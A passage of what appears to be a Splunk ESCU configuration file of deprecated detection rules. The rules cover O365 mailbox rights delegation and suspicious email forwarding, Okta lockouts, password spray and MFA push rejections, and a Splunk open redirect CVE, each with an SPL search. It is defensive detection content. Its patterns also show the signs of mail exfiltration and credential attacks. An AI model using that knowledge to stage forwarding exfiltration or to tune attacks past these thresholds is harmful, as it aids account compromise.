This could lead to unauthorized access to sensitive emails, impersonation through sending emails as or on behalf of the mailbox owner, or data manipulation by altering or deleting emails. Immediate investigation is required to validate the legitimacy of the permission change and to assess the potential risks associated with the granted access. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1114.002", "T1114", "T1098.002", "T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Elevated Mailbox Permission Assigned`. This analytic identifies instances where potentially suspicious rights are delegated within the Office 365 environment. Specifically, it detects when a user is granted FullAccess, SendAs, or SendOnBehalf permissions on another users mailbox. Such permissions can allow a user to access, send emails from, or send emails on behalf of the target mailbox. The detection leverages O365 audit logs, focusing on the Add-MailboxPermission operation. By parsing the parameters of this operation, the analytic filters for events where FullAccess, SendAs, or SendOnBehalf rights are granted. It then aggregates this data to capture the source user (who was granted the permissions), the destination user (whose mailbox was affected), the specific operation, and the type of access rights granted. Delegating mailbox rights, especially those as powerful as FullAccess, can pose significant security risks. While there are legitimate scenarios for these permissions, such as an executive assistant needing access to an executives mailbox, there are also malicious scenarios where an attacker or a compromised insider might grant themselves unauthorized access to sensitive mailboxes. 
Monitoring for these permissions changes is crucial to detect potential insider threats, compromised accounts, or other malicious activities.If the detection is a true positive, it indicates that a user has been granted potentially high-risk permissions on another users mailbox. This could lead to unauthorized access to sensitive emails, impersonation through sending emails as or on behalf of the mailbox owner, or data manipulation by altering or deleting emails. Immediate investigation is required to validate the legitimacy of the permission change and to assess the potential risks associated with the granted access. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = While there are legitimate scenarios for these permissions, such as an executive assistant needing access to an executive's mailbox, there are also malicious scenarios. Investigate and filter as needed. 
action.escu.creation_date = 2020-12-15 action.escu.modification_date = 2020-12-15 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Suspicious Rights Delegation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = User $user$ has delegated suspicious rights $AccessRights$ to user $dest_user$ that allow access to sensitive action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - O365 Suspicious Rights Delegation - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1114.002", "T1114", "T1098.002", "T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Elevated Mailbox Permission Assigned`. This analytic identifies instances where potentially suspicious rights are delegated within the Office 365 environment. Specifically, it detects when a user is granted FullAccess, SendAs, or SendOnBehalf permissions on another users mailbox. Such permissions can allow a user to access, send emails from, or send emails on behalf of the target mailbox. The detection leverages O365 audit logs, focusing on the Add-MailboxPermission operation. 
By parsing the parameters of this operation, the analytic filters for events where FullAccess, SendAs, or SendOnBehalf rights are granted. It then aggregates this data to capture the source user (who was granted the permissions), the destination user (whose mailbox was affected), the specific operation, and the type of access rights granted. Delegating mailbox rights, especially those as powerful as FullAccess, can pose significant security risks. While there are legitimate scenarios for these permissions, such as an executive assistant needing access to an executives mailbox, there are also malicious scenarios where an attacker or a compromised insider might grant themselves unauthorized access to sensitive mailboxes. Monitoring for these permissions changes is crucial to detect potential insider threats, compromised accounts, or other malicious activities.If the detection is a true positive, it indicates that a user has been granted potentially high-risk permissions on another users mailbox. This could lead to unauthorized access to sensitive emails, impersonation through sending emails as or on behalf of the mailbox owner, or data manipulation by altering or deleting emails. Immediate investigation is required to validate the legitimacy of the permission change and to assess the potential risks associated with the granted access. 
action.notable.param.rule_title = O365 Suspicious Rights Delegation action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=Add-MailboxPermission | spath input=Parameters | rename User AS src_user, Identity AS dest_user | search AccessRights=FullAccess OR AccessRights=SendAs OR AccessRights=SendOnBehalf | stats count earliest(_time) as firstTime latest(_time) as lastTime by user src_user dest_user Operation AccessRights |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_rights_delegation_filter` [ESCU - O365 Suspicious User Email Forwarding - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Mailbox Email Forwarding Enabled`. The following analytic detects when multiple users have configured a forwarding rule to the same destination to proactively identify and investigate potential security risks related to email forwarding and take appropriate actions to protect the organizations data and prevent unauthorized access or data breaches. This detection is made by a Splunk query to O365 management activity logs with the operation `Set-Mailbox` to gather information about mailbox configurations. Then, the query uses the `spath` function to extract the parameters and rename the "Identity" field as "src_user" and searches for entries where the "ForwardingSmtpAddress" field is not empty, which indicates the presence of a forwarding rule. 
Next, the analytic uses the `stats` command to group the results by the forwarding email address and count the number of unique source users (`src_user`). Finally, it filters the results and only retains entries where the count of source users (`count_src_user`) is greater than 1, which indicates that multiple users have set up forwarding rules to the same destination. This detection is important because it suggests that multiple users are forwarding emails to the same destination without proper authorization, which can lead to the exposure of sensitive information, loss of data control, or unauthorized access to confidential emails. Investigating and addressing this issue promptly can help prevent data breaches and mitigate potential damage.indicates a potential security risk since multiple users forwarding emails to the same destination can be a sign of unauthorized access, data exfiltration, or a compromised account. Additionally, it also helps to determine if the forwarding rules are legitimate or if they indicate a security incident. False positives can occur if there are legitimate reasons for multiple users to forward emails to the same destination, such as a shared mailbox or a team collaboration scenario. Next steps include further investigation and context analysis to determine the legitimacy of the forwarding rules. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.003", "T1114"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `O365 Mailbox Email Forwarding Enabled`. The following analytic detects when multiple users have configured a forwarding rule to the same destination to proactively identify and investigate potential security risks related to email forwarding and take appropriate actions to protect the organizations data and prevent unauthorized access or data breaches. 
This detection is made by a Splunk query to O365 management activity logs with the operation `Set-Mailbox` to gather information about mailbox configurations. Then, the query uses the `spath` function to extract the parameters and rename the "Identity" field as "src_user" and searches for entries where the "ForwardingSmtpAddress" field is not empty, which indicates the presence of a forwarding rule. Next, the analytic uses the `stats` command to group the results by the forwarding email address and count the number of unique source users (`src_user`). Finally, it filters the results and only retains entries where the count of source users (`count_src_user`) is greater than 1, which indicates that multiple users have set up forwarding rules to the same destination. This detection is important because it suggests that multiple users are forwarding emails to the same destination without proper authorization, which can lead to the exposure of sensitive information, loss of data control, or unauthorized access to confidential emails. Investigating and addressing this issue promptly can help prevent data breaches and mitigate potential damage.indicates a potential security risk since multiple users forwarding emails to the same destination can be a sign of unauthorized access, data exfiltration, or a compromised account. Additionally, it also helps to determine if the forwarding rules are legitimate or if they indicate a security incident. False positives can occur if there are legitimate reasons for multiple users to forward emails to the same destination, such as a shared mailbox or a team collaboration scenario. Next steps include further investigation and context analysis to determine the legitimacy of the forwarding rules. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. 
This search works with o365:management:activity action.escu.known_false_positives = unknown action.escu.creation_date = 2020-12-16 action.escu.modification_date = 2020-12-16 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Suspicious User Email Forwarding - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = User $user$ configured multiple users $src_user$ with a count of $count_src_user$, a forwarding rule to same destination $ForwardingSmtpAddress$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 48}, {"risk_object_field": "ForwardingSmtpAddress", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - O365 Suspicious User Email Forwarding - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.003", "T1114"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation=Set-Mailbox | spath input=Parameters | rename Identity AS src_user | search ForwardingSmtpAddress=* | stats dc(src_user) AS count_src_user earliest(_time) as firstTime latest(_time) as lastTime values(src_user) AS src_user values(user) AS 
user by ForwardingSmtpAddress | where count_src_user > 1 |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`o365_suspicious_user_email_forwarding_filter` [ESCU - Okta Account Locked Out - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Accounts Locked Out`. The following analytic utilizes the user.acount.lock event to identify associates who are locked out of Okta. An adversary attempting to brute force or password spray account names may lock accounts out depending on the threshold. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Accounts Locked Out`. The following analytic utilizes the user.acount.lock event to identify associates who are locked out of Okta. An adversary attempting to brute force or password spray account names may lock accounts out depending on the threshold. action.escu.how_to_implement = This analytic is specific to Okta and requires Okta logs to be ingested. action.escu.known_false_positives = False positives may be present. Tune Okta and tune the analytic to ensure proper fidelity. Modify risk score as needed. Drop to anomaly until tuning is complete. 
action.escu.creation_date = 2022-09-21 action.escu.modification_date = 2022-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Account Locked Out - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity", "Okta MFA Exhaustion"] action.risk = 1 action.risk.param._risk_message = $src_user$ account has been locked out. action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Okta Account Locked Out - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity", "Okta MFA Exhaustion"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=user.account.lock | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) values(src_user) as user by src_ip eventType status | where count >=3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `okta_account_locked_out_filter` [ESCU - Okta Account Lockout Events - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. 
**DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Accounts Locked Out`. The following anomaly will generate based on account lockout events utilizing Okta eventTypes of user.account.lock.limit or user.account.lock. Per the Okta docs site, this event is fired when a user account has reached the lockout limit. The account will not auto-unlock and a user or client cannot gain access to the account. This event indicates an account that will not be able to log in until remedial action is taken by the account admin. This event can be used to understand the specifics of an account lockout. Often this indicates a client application that is repeatedly attempting to authenticate with invalid credentials such as an old password. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Accounts Locked Out`. The following anomaly will generate based on account lockout events utilizing Okta eventTypes of user.account.lock.limit or user.account.lock. Per the Okta docs site, this event is fired when a user account has reached the lockout limit. The account will not auto-unlock and a user or client cannot gain access to the account. This event indicates an account that will not be able to log in until remedial action is taken by the account admin. This event can be used to understand the specifics of an account lockout. Often this indicates a client application that is repeatedly attempting to authenticate with invalid credentials such as an old password. action.escu.how_to_implement = This analytic is specific to Okta and requires Okta logs to be ingested. action.escu.known_false_positives = None. 
Account lockouts should be followed up on to determine if the actual user was the one who caused the lockout, or if it was an unauthorized actor. action.escu.creation_date = 2022-09-19 action.escu.modification_date = 2022-09-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Account Lockout Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity"] action.risk = 1 action.risk.param._risk_message = The following user $src_user$ has locked out their account within Okta. action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Okta Account Lockout Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType IN (user.account.lock.limit,user.account.lock) | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | stats count min(_time) as firstTime max(_time) as lastTime values(src_user) by displayMessage, country, state, city, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_account_lockout_events_filter` [ESCU - Okta Failed 
SSO Attempts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with this detection `Okta Unauthorized Access to Application - DM`. The following anomaly identifies failed Okta SSO events utilizing the legacy Okta event "unauth app access attempt". action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with this detection `Okta Unauthorized Access to Application - DM`. The following anomaly identifies failed Okta SSO events utilizing the legacy Okta event "unauth app access attempt". action.escu.how_to_implement = This search is specific to Okta and requires Okta logs are being ingested in your Splunk deployment. action.escu.known_false_positives = There may be a faulty config preventing legitmate users from accessing apps they should have access to. action.escu.creation_date = 2022-09-21 action.escu.modification_date = 2022-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Failed SSO Attempts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity"] action.risk = 1 action.risk.param._risk_message = $src_user$ failed SSO authentication to the app. 
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 16}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Okta Failed SSO Attempts - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 40, "impact": 40, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=app.generic.unauth_app_access_attempt | stats min(_time) as firstTime max(_time) as lastTime values(app) as Apps count by src_user, result ,displayMessage, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_failed_sso_attempts_filter` [ESCU - Okta ThreatInsight Login Failure with High Unknown users - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Oktas ThreatInsight to identify Login failures with high unknown users count and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1110.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Okta's ThreatInsight to identify Login failures with high unknown users count and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted.
action.escu.how_to_implement = This search is specific to Okta and requires Okta logs to be ingested in your Splunk deployment.
action.escu.known_false_positives = Fidelity of this is high as it is Okta ThreatInsight. Filter and modify as needed.
action.escu.creation_date = 2023-03-09
action.escu.modification_date = 2023-03-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Okta ThreatInsight Login Failure with High Unknown users - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Okta"]
action.escu.analytic_story = ["Suspicious Okta Activity"]
action.risk = 1
action.risk.param._risk_message = Okta ThreatInsight has detected or prevented a high number of login failures.
action.risk.param._risk = [{"risk_object_field": "outcome.reason", "risk_object_type": "other", "risk_score": 50}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Okta ThreatInsight Login Failure with High Unknown users - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1110.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Okta's ThreatInsight to identify Login failures with high unknown users count and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted.
action.notable.param.rule_title = Okta ThreatInsight Login Failure with High Unknown users
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `okta` eventType="security.threat.detected" AND outcome.reason="Login failures with high unknown users count*" | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user eventType client.userAgent.rawUserAgent client.userAgent.browser outcome.reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_threatinsight_login_failure_with_high_unknown_users_filter`

[ESCU - Okta ThreatInsight Suspected PasswordSpray Attack - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Okta's ThreatInsight to identify "PasswordSpray" and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1110.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Okta's ThreatInsight to identify "PasswordSpray" and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted.
action.escu.how_to_implement = This search is specific to Okta and requires Okta logs to be ingested in your Splunk deployment.
action.escu.known_false_positives = Fidelity of this is high as it is Okta ThreatInsight. Filter and modify as needed.
action.escu.creation_date = 2023-03-09
action.escu.modification_date = 2023-03-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Okta ThreatInsight Suspected PasswordSpray Attack - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Okta"]
action.escu.analytic_story = ["Suspicious Okta Activity"]
action.risk = 1
action.risk.param._risk_message = Okta ThreatInsight has detected or prevented a PasswordSpray attack.
action.risk.param._risk = [{"risk_object_field": "outcome.reason", "risk_object_type": "other", "risk_score": 60}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Okta ThreatInsight Suspected PasswordSpray Attack - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 100, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1110.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Okta's ThreatInsight to identify "PasswordSpray" and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted.
action.notable.param.rule_title = Okta ThreatInsight Suspected PasswordSpray Attack
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `okta` eventType="security.threat.detected" AND outcome.reason="Password Spray" | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by eventType client.userAgent.rawUserAgent client.userAgent.browser outcome.reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_threatinsight_suspected_passwordspray_attack_filter`

[ESCU - Okta Two or More Rejected Okta Pushes - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Failed MFA Requests For User`. The following analytic identifies an account that has rejected more than 2 Push notifications in a 10 minute window. Modify this query for your environment by raising the count or widening the time window.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Failed MFA Requests For User`. The following analytic identifies an account that has rejected more than 2 Push notifications in a 10 minute window. Modify this query for your environment by raising the count or widening the time window.
action.escu.how_to_implement = This analytic is specific to Okta and requires Okta logs to be ingested.
action.escu.known_false_positives = False positives may be present. Tune Okta and tune the analytic to ensure proper fidelity. Modify risk score as needed. Drop to anomaly until tuning is complete.
action.escu.creation_date = 2022-09-27
action.escu.modification_date = 2022-09-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Okta Two or More Rejected Okta Pushes - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Okta"]
action.escu.analytic_story = ["Suspicious Okta Activity", "Okta MFA Exhaustion"]
action.risk = 1
action.risk.param._risk_message = $user$ account has rejected multiple Okta pushes.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Okta Two or More Rejected Okta Pushes - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity", "Okta MFA Exhaustion"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Failed MFA Requests For User`. The following analytic identifies an account that has rejected more than 2 Push notifications in a 10 minute window. Modify this query for your environment by raising the count or widening the time window.
action.notable.param.rule_title = Okta Two or More Rejected Okta Pushes
action.notable.param.security_domain = access
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `okta` outcome.reason="User rejected Okta push verify" OR (debugContext.debugData.factor="OKTA_VERIFY_PUSH" outcome.result=FAILURE legacyEventType="core.user.factor.attempt_fail" "target{}.detailEntry.methodTypeUsed"="Get a push notification") | bin _time as bin_time span=10m | eval user=coalesce(actor.alternateId,user), user=mvindex(split(user, "@"), 0), event_time = _time | stats earliest(event_time) as event_time, min(_time) as firsttime max(_time) as lasttime values(client.ipAddress) as client.ipAddress, values(outcome.reason) as outcome, values(src_ip) AS src_ip, values(client.userAgent.rawUserAgent) as user_agent, values(eventType) as eventType, values(outcome.result) as action, values(legacyEventType) as legacyEventType values(index) as idx, values(sourcetype) as st count by bin_time user host | rename bin_time as timeWindow | convert ctime(*timeWindow) ctime(firsttime) ctime(lasttime) | where count >= 2 | `okta_two_or_more_rejected_okta_pushes_filter`

[ESCU - Open Redirect in Splunk Web - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search allows you to look for evidence of exploitation for CVE-2016-4859, the Splunk Open Redirect Vulnerability.
action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search allows you to look for evidence of exploitation for CVE-2016-4859, the Splunk Open Redirect Vulnerability.
action.escu.how_to_implement = No extra steps needed to implement this search.
action.escu.known_false_positives = None identified
action.escu.creation_date = 2017-09-19
action.escu.modification_date = 2017-09-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Open Redirect in Splunk Web - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = tbd
action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Open Redirect in Splunk Web - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 13"], "confidence": 50, "cve": ["CVE-2016-4859"], "impact": 50, "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search allows you to look for evidence of exploitation for CVE-2016-4859, the Splunk Open Redirect Vulnerability.
action.notable.param.rule_title = Open Redirect in Splunk Web
action.notable.param.security_domain = network
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
